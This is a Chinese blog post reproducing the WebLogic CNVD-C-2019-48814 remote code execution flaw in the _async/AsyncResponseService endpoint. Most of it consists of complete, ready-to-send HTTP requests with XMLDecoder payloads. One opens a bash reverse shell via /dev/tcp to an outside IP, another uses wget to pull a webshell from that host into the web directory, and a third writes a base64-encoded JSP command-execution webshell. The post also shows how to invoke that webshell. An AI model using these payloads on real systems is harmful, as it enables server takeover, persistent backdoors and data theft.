美文网首页网络安全信息安全
weblogic CNVD-C-2019-48814(CVE-2

weblogic CNVD-C-2019-48814(CVE-2

作者: 捡垃圾的小弟弟 | 来源:发表于2019-05-25 14:05 被阅读277次

    漏洞介绍

    中国民生银行股份有限公司举办攻防演练发现攻击方采用48814 0day拿下服务器。

    漏洞影响

    Weblogic 10.3.6.0

Weblogic 12.1.3.0

Weblogic 12.2.1.2

Weblogic 12.2.1.3

    复现过程

    1.确认漏洞存在

    http://www.bug1024.cn:17021/_async/AsyncResponseService

    2.监听自己服务器的9999端口

    3.反弹shell

    POST /_async/AsyncResponseService HTTP/1.1
Host: www.bug1024.cn:17001
Content-Length: 794
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: think_var=zh-cn; PHPSESSID=40d1rb84g60dqi60nabgv05qn5
X-Forwarded-For: 192.168.111.135
Connection: keep-alive
Upgrade-Insecure-Requests: 1
content-type: text/xml



<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">   
<soapenv:Header> 
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i &gt;&amp; /dev/tcp/47.101.198.184/9999 0&gt;&amp;1</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>

    含义:把当前运行weblogic的bash反弹到47.101.198.184的9999端口上。



    反弹成功


    4.上传webshell

    POST /_async/AsyncResponseService HTTP/1.1
Host: www.bug1024.cn:17001
Content-Length: 865
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: think_var=zh-cn; PHPSESSID=40d1rb84g60dqi60nabgv05qn5
X-Forwarded-For: 192.168.111.135
Connection: keep-alive
Upgrade-Insecure-Requests: 1
content-type: text/xml


<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">   
<soapenv:Header> 
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>wget http://47.101.198.184:80/webshell.txt -O servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/webshell3.jsp</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>

    5.访问webshell

    http://www.bug1024.cn:17001/_async/webshell3.jsp

    无网写shell

    POST /_async/AsyncResponseService HTTP/1.1
Host: www.bug1024.cn:17001
Content-Length: 1388
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Cookie: think_var=zh-cn; PHPSESSID=qro0j9fr8vo4omtc06nvuuou65; JSESSIONID=r71RcyjP4TtTpnYNkhcpvZJNqLzWr82cpzDtTWDzljwnJJl9gm0p!-1900228417
Connection: close
Upgrade-Insecure-Requests: 1
content-type: text/xml



<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">   
<soapenv:Header> 
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>echo PCUKICAgIGlmKCIxMjMiLmVxdWFscyhyZXF1ZXN0LmdldFBhcmFtZXRlcigicHdkIikpKXsKICAgICAgICBqYXZhLmlvLklucHV0U3RyZWFtIGluID0gUnVudGltZS5nZXRSdW50aW1lKCkuZXhlYyhyZXF1ZXN0LmdldFBhcmFtZXRlcigiY21kIikpLmdldElucHV0U3RyZWFtKCk7CiAgICAgICAgaW50IGEgPSAtMTsgICAgICAgICAgCiAgICAgICAgYnl0ZVtdIGIgPSBuZXcgYnl0ZVsxMDI0XTsgICAgICAgICAgCiAgICAgICAgb3V0LnByaW50KCI8cHJlPiIpOyAgICAgICAgICAKICAgICAgICB3aGlsZSgoYT1pbi5yZWFkKGIpKSE9LTEpewogICAgICAgICAgICBvdXQucHJpbnRsbihuZXcgU3RyaW5nKGIpKTsgICAgICAgICAgCiAgICAgICAgfQogICAgICAgIG91dC5wcmludCgiPC9wcmU+Iik7CiAgICB9IAogICAgJT4= |base64 -d > servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/webshell1.jsp</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>

    访问 /_async/webshell.jsp?pwd=123&cmd=ifconfig

    总结

    1.反弹shell到自己服务器
    2.burp构造payload,返回202状态如上图
    3.反弹shell成功
    4.把webshell.txt上传到自己服务器上
    5.burp构造payload,返回202状态如上图
    6.访问webshell.jsp

    参考:https://www.jianshu.com/p/c4982a845f55?tdsourcetag=s_pctim_aiomsg

    相关文章

      网友评论

        本文标题:weblogic CNVD-C-2019-48814(CVE-2

        本文链接:https://www.haomeiwen.com/subject/yjiazqtx.html

        延伸阅读

        深度阅读

        • 您也可以注册成为美文阅读网的作者,发表您的原创作品、分享您的心情!

        栏目导航

        热点阅读

        网络安全

        信息安全

        关于我们|服务条款|联系我们|weblogic CNVD-C-2019-48814(CVE-2|投稿指南|网站地图|RSS订阅|排版工具|手机版

        提供经典美文摘抄,优美散文欣赏,现代诗歌精选,短篇小说,心情随笔,表白情书范文,故事会在线阅读欣赏

        Copyright © 2014-2023 Haomeiwen.com All Rights Reserved. 好美文阅读网 版权所有

        备案信息:桂公网安备 45052102000051号 · 桂ICP备13007215号-3

        本站所收录作品、热点评论等信息部分来源互联网,目的只是为了系统归纳学习和传递资讯

        所有作品版权归原创作者所有,与本站立场无关,如不慎侵犯了你的权益,请联系我们告知,我们将做删除处理!